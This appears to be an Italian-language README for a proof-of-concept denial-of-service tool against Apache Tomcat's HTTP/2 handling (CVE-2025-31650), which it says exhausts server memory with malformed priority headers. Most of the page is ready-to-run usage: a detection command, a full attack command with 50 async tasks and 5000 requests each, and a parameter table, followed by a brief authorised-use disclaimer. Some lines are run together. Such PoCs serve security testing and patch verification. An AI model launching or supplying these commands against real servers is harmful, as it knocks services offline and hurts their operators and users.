
CVE-2025-31650 PoC
🚨 Proof of Concept (PoC) per la vulnerabilità DoS HTTP/2 di Apache Tomcat (CVE-2025-31650)
Questo script provoca una condizione di esaurimento della memoria in Apache Tomcat inviando intestazioni priority malformate su HTTP/2.
Server (rileva Tomcat)--check-only (non intrusiva)python3 tomcatkiller.py --target https://example.com:8443 --check-only
python3 tomcatkiller.py --target https://example.com:8443 --exploit --tasks 50 --requests 5000
| Parametro | Descrizione |
|---|---|
--target | URL target completo con protocollo e porta |
--check-only | Testa solo se il server supporta HTTP/2 e Tomcat |
--exploit | Esegue l'attacco DoS effettivo |
--tasks | Numero di attività asincrone (default: 50) |
--requests | Richieste per attività (default: 5000) |
Questo PoC è solo per test di sicurezza educativi e autorizzati.
Non utilizzarlo contro sistemi senza autorizzazione esplicita.